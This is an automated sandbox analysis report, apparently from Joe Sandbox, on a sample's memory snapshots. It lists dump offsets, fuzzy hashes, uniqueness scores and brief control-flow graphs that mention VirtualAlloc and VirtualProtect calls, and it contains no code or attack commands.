                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Em>N
                                                                                                                                      • API String ID: 0-488659082
                                                                                                                                      • Opcode ID: 612d148e11efb965369db35dce34415fdcb62cf1312b0d657f9cfbf082cb0742
                                                                                                                                      • Instruction ID: ffe3c107ef308655b8733be9d4bc57c50ea20b819f5c53ec6040dcc26d597533
                                                                                                                                      • Opcode Fuzzy Hash: 612d148e11efb965369db35dce34415fdcb62cf1312b0d657f9cfbf082cb0742
                                                                                                                                      • Instruction Fuzzy Hash: 40222670E0421D8FDB58DFA8C895AEDBBB2FF48300F14866AD419EB255DB34A985CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4eb7a3a50adc4dffd42bbe09d4555bee91ca21fdf21866dca74289fa1ccacdbb
                                                                                                                                      • Instruction ID: 91352fb85883f8000b88a70aa522183f6d59aa06922576ec28f7e12d8a52a8fd
                                                                                                                                      • Opcode Fuzzy Hash: 4eb7a3a50adc4dffd42bbe09d4555bee91ca21fdf21866dca74289fa1ccacdbb
                                                                                                                                      • Instruction Fuzzy Hash: ADA1E071A19A4D8FE798EB6CC8647A97BE1FFA9300F4001BED05DD72E6CBB428018741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 278 7ffd9b891ae1-7ffd9b891b15 280 7ffd9b891b17 278->280 281 7ffd9b891b1c-7ffd9b891b6b 278->281 280->281 284 7ffd9b891b6d 281->284 285 7ffd9b891b72-7ffd9b891bbb 281->285 284->285 288 7ffd9b891bbd 285->288 289 7ffd9b891bc2-7ffd9b891c15 285->289 288->289 292 7ffd9b891c17 289->292 293 7ffd9b891c1c-7ffd9b891c69 289->293 292->293 296 7ffd9b891c6b 293->296 297 7ffd9b891c70-7ffd9b891cc0 293->297 296->297 300 7ffd9b891cc7-7ffd9b891d38 297->300 301 7ffd9b891cc2 297->301 304 7ffd9b891d3a 300->304 305 7ffd9b891d3f-7ffd9b891d48 300->305 301->300 304->305 306 7ffd9b891dda-7ffd9b891f53 VirtualAlloc 305->306 307 7ffd9b891d4e-7ffd9b891dae call 7ffd9b88fe40 305->307 317 7ffd9b891f55 306->317 318 7ffd9b891f5b-7ffd9b891fbf 306->318 323 7ffd9b891db6-7ffd9b891dd3 307->323 317->318 323->306
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b88f000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 7dfe0e1c947eab356262f9cac60e8a535105ec760442a1cc9bd3ad177f4c6f2f
                                                                                                                                      • Instruction ID: dbe919d1488b9925405d6245cdbb60af8d98de20643db90e10824a04ccbe1923
                                                                                                                                      • Opcode Fuzzy Hash: 7dfe0e1c947eab356262f9cac60e8a535105ec760442a1cc9bd3ad177f4c6f2f
                                                                                                                                      • Instruction Fuzzy Hash: AA029E3090DA8D8FDF95EF68C855AE97BF1FF59300F0101AAE448D72A2DB34A985CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 390 7ffd9b8903fe-7ffd9b89040b 391 7ffd9b890416-7ffd9b890427 390->391 392 7ffd9b89040d-7ffd9b890415 390->392 393 7ffd9b890429-7ffd9b890431 391->393 394 7ffd9b890432-7ffd9b89054b VirtualProtect 391->394 392->391 393->394 399 7ffd9b89054d 394->399 400 7ffd9b890553-7ffd9b8905a3 394->400 399->400
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b88f000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction ID: 605fa173f2b3929a505135a45bcb3001d5fad243aa1ee5d40a56158ae7331512
                                                                                                                                      • Opcode Fuzzy Hash: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction Fuzzy Hash: 21517E70D0864D8FDF54DFA8C845AEDBBF0FB6A310F1042AAD449E3256DB74A885CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 403 7ffd9b894a02-7ffd9b894a35 405 7ffd9b894a3f-7ffd9b894a78 403->405 407 7ffd9b894a86-7ffd9b894a8d 405->407 408 7ffd9b894a7a-7ffd9b894a84 405->408 409 7ffd9b894aad-7ffd9b894f8c 407->409 410 7ffd9b894a8f-7ffd9b894c74 407->410 408->407 409->407 417 7ffd9b894f92-7ffd9b894f9c 409->417 410->407 416 7ffd9b894c7a-7ffd9b894c84 410->416 416->407 417->407
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction ID: 4e0f4fe64aea6ad4236fe90158fee17b74f40b1303a9f276293543852cdea031
                                                                                                                                      • Opcode Fuzzy Hash: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction Fuzzy Hash: E0310370A1962D8FEBB8DB54C8A47A9B7F1FF49300F1041E9D04DA2291DB786BC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 418 7ffd9b894ab9-7ffd9b894ac2 420 7ffd9b894acd-7ffd9b894b0c 418->420 422 7ffd9b894a86-7ffd9b894a8d 420->422 423 7ffd9b894b12-7ffd9b894b1c 420->423 424 7ffd9b894aad-7ffd9b894f8c 422->424 425 7ffd9b894a8f-7ffd9b894c74 422->425 423->422 424->422 432 7ffd9b894f92-7ffd9b894f9c 424->432 425->422 431 7ffd9b894c7a-7ffd9b894c84 425->431 431->422 432->422
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: 111eade1d85496f17a1b5b37a15ded02e881aba5c8b45211e355e1e47b7e3657
                                                                                                                                      • Instruction ID: da2f7102d7140afc8d291e74577f2382fc3fe1e26ffe2646bbdbf67258b7c6f3
                                                                                                                                      • Opcode Fuzzy Hash: 111eade1d85496f17a1b5b37a15ded02e881aba5c8b45211e355e1e47b7e3657
                                                                                                                                      • Instruction Fuzzy Hash: 5B011A30E4561E8EEBB8DF54C8987E8B6F1EB59341F1542FAD05CD22A1DA741AC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 69b8cc3fec3c6c200716316c244af780e67adcddc1d9b9f06af76fbf70147bb4
                                                                                                                                      • Instruction ID: 4eead7ca18541a69e5b085808e071465375fc0e7c48d07e6d02df18b9f56ab8e
                                                                                                                                      • Opcode Fuzzy Hash: 69b8cc3fec3c6c200716316c244af780e67adcddc1d9b9f06af76fbf70147bb4
                                                                                                                                      • Instruction Fuzzy Hash: B942AC70A0991D8FDFA8DF58C895AA9B7B2FF98301F1141E9D00DD72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction ID: 88611a6c14a18fce6b6c5543a0fc41ea59210c147374c3482326d47b819cf9e6
                                                                                                                                      • Opcode Fuzzy Hash: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction Fuzzy Hash: 09D15DB1E1964D8FEB58EB58C8A5BF8B7B1FF58300F4401BAD00D972E2DA346981CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6ef12ce13a47105276b091e996158d251ea20b8c2561310e9a305a6455906636
                                                                                                                                      • Instruction ID: 635815ba314535664376e2b556949d1e51d411ce3dfda64859bcbe7cb99aa7fd
                                                                                                                                      • Opcode Fuzzy Hash: 6ef12ce13a47105276b091e996158d251ea20b8c2561310e9a305a6455906636
                                                                                                                                      • Instruction Fuzzy Hash: AEE1DC70A0991D8FDFA8DF58C895AA9B7B1FF98300F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: dda7d5c85c5ca0c1bd956f99c2438b4ff8f82b75db7682cdd590f5775e3d4ba1
                                                                                                                                      • Instruction ID: 57a0043c0dd544101301821cde5a972b4229a5ac3483c9cf33cb69658f596b59
                                                                                                                                      • Opcode Fuzzy Hash: dda7d5c85c5ca0c1bd956f99c2438b4ff8f82b75db7682cdd590f5775e3d4ba1
                                                                                                                                      • Instruction Fuzzy Hash: 1DD1D970E0991D8FDFA8DF58C894AA9B7B1FF98301F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ab20efcbe06575ccdd38ae4769b2847f6c968f77b74796e95ca5d73d587b04fb
                                                                                                                                      • Instruction ID: 7c7588b743481f38101082f60773beb95c6d2446990f5161b7b9b70ac2900356
                                                                                                                                      • Opcode Fuzzy Hash: ab20efcbe06575ccdd38ae4769b2847f6c968f77b74796e95ca5d73d587b04fb
                                                                                                                                      • Instruction Fuzzy Hash: 90C1DC70E0991D8FDFA8DF58C895AA9B7B1FF98301F1141A9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8b3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction ID: 615a9b38052f005ffd7c29a6b748a9890ba235b13362755324c61ec293264abd
                                                                                                                                      • Opcode Fuzzy Hash: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction Fuzzy Hash: 57317C70A0964E8FDF54DF58C8A4AED7BB1FF48344F06026AE859E3291CB34A941CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5bc12247c5d256f0bf8f1dce1b0f3d07bc15183f7d4bf4392a4abffbecf36676
                                                                                                                                      • Instruction ID: 8e82187dc7b14ec6e083aceaa20b532e332e26d5d9bd0434d334783dbde3ad4b
                                                                                                                                      • Opcode Fuzzy Hash: 5bc12247c5d256f0bf8f1dce1b0f3d07bc15183f7d4bf4392a4abffbecf36676
                                                                                                                                      • Instruction Fuzzy Hash: 98319BB1A0991C8FDFA8DF14C855AE9B3B1FB68305F1041EE810EE32A4CB759A81CF45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bfe82531448886aa8ff793870f23568d5d81af476a19259e3edc2f4d77f60e09
                                                                                                                                      • Instruction ID: d09bf9d641126726395b980f04200151092fa22112cbb8bdcb5a85534ea27d2d
                                                                                                                                      • Opcode Fuzzy Hash: bfe82531448886aa8ff793870f23568d5d81af476a19259e3edc2f4d77f60e09
                                                                                                                                      • Instruction Fuzzy Hash: 45310871E1DA8E8FE7229BA8C8212BD7BB1EF49310F060577D465DB1E2CA382609C751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction ID: a41b5f7eb359129346f9df0357e569375c61f8cc0c0d94b2c0beea93d1abd82d
                                                                                                                                      • Opcode Fuzzy Hash: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction Fuzzy Hash: DC315C31A0F64E8FEB21DBA4C9642ED7BB1FF19300F1105B6E409E61E2DA786E18C755
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction ID: 87b3640d0eb154842936b6571defd6b63e5e68ef3b84a7edec6e99976d692abf
                                                                                                                                      • Opcode Fuzzy Hash: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction Fuzzy Hash: DC219F31A1965D8FDF19DF58C8616EDB7B1FB59310F01023AD40AD3291DB78A915CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
                                                                                                                                      • Instruction ID: 56f8cc8c88a342abc88996c65922bf3588a34b89148783783fbe75b9eb0b88f8
                                                                                                                                      • Opcode Fuzzy Hash: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
                                                                                                                                      • Instruction Fuzzy Hash: 9B31B270E15A2E8FEBB5EB54C858BB8B2F5AF58711F4140F9901DA22A5DE795BC0CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7a9e3a1341b1d612dc4ddedbd9dd7fe8f19444268e7c4c7d2c4e236717b299ae
                                                                                                                                      • Instruction ID: a7131788e42ae6908141235688c7ea9a526ba803c4787c2b35c51b656769261f
                                                                                                                                      • Opcode Fuzzy Hash: 7a9e3a1341b1d612dc4ddedbd9dd7fe8f19444268e7c4c7d2c4e236717b299ae
                                                                                                                                      • Instruction Fuzzy Hash: 2121D670A0A50D8FEB68EF94D464BBCB7B1EF5C301F1540AEC01AE36A1CA756A918F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
